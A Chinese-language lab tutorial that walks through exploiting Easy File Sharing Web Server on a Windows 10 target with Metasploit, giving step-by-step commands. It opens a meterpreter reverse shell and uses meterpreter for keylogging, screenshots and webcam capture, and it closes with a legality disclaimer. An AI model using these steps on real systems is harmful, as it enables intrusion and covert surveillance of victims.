msf win10漏洞 | 您所在的位置:网站首页 › windows7最新漏洞 › msf win10漏洞 |
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing 注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。 step-1首先我们先用nmap扫描一下靶机开了哪些服务root@kali:~# nmap -sV 10.3.37.56 ![]() namp扫描结果 我们可以看到80端口和443端口开放了,对应的是Easy File Sharing Web Server,满足EasyFileSharing漏洞攻击,进入下一步。 step-2打开msf控制台,设置攻击参数 root@kali:~# msfconsole #进入控制台,稍微等一下msf > search EasyFileSharing #查找我们要用的漏洞![]() 搜索结果 我们选择最新的一个,2017-06-12的版本,并设置payload。 msf > use exploit/windows/http/easyfilesharing_post #使用这个漏洞msf exploit(windows/http/easyfilesharing_post) > set payload windows/meterpreter/reverse_tcp #设置攻击payload我们用show options看一下需要什么攻击参数 msf exploit(windows/http/easyfilesharing_post) > show options![]() 设置参数 根据Required属性看一下哪些是需要配置的,其中一些是配置好的,我们只需将其他的配置好就ok了。 msf exploit(windows/http/easyfilesharing_post) > set lhost 10.3.134.27 #设置本地ipmsf exploit(windows/http/easyfilesharing_post) > set rhost 10.3.37.56 #设置远程ip参数都配置好了,接着就是激动人心的exploit了。 msf exploit(windows/http/easyfilesharing_post) > exploit #攻击![]() 显示这个页面,说明你成功了 逐个输入以下命令,试试 meterpreter > getuid #获取靶机uidmeterpreter > shell #进入靶机shellmeterpreter > screenshot #靶机截屏meterpreter > webcam_snap #用靶机摄像头拍照meterpreter > webcam_stream #用靶机摄像头录像meterpreter > keyscan_start #开启键盘记录meterpreter > keyscan_dump #捕获键盘记录meterpreter > keyscan_stop #停止键盘记录我们来测试几个好玩的1st.捕捉靶机键盘记录 ![]() 捕捉到靶机键盘记录(hack hack) 2nd.捕捉靶机截屏 ![]() 捕捉靶机截屏 ![]() 捕捉靶机截屏 3rd.用靶机摄像头拍照 ![]() 利用靶机摄像头拍照 ![]() 靶机摄像头像素略渣,不过看看我们的公教区学习环境吧 小结:我们做攻击实验都是在环境都配置好的情况下,现实生活中不会有这么好的肉鸡。而且网络攻击属于违法行为,人生路漫漫,且行且珍惜 |
CopyRight 2018-2019 实验室设备网 版权所有 |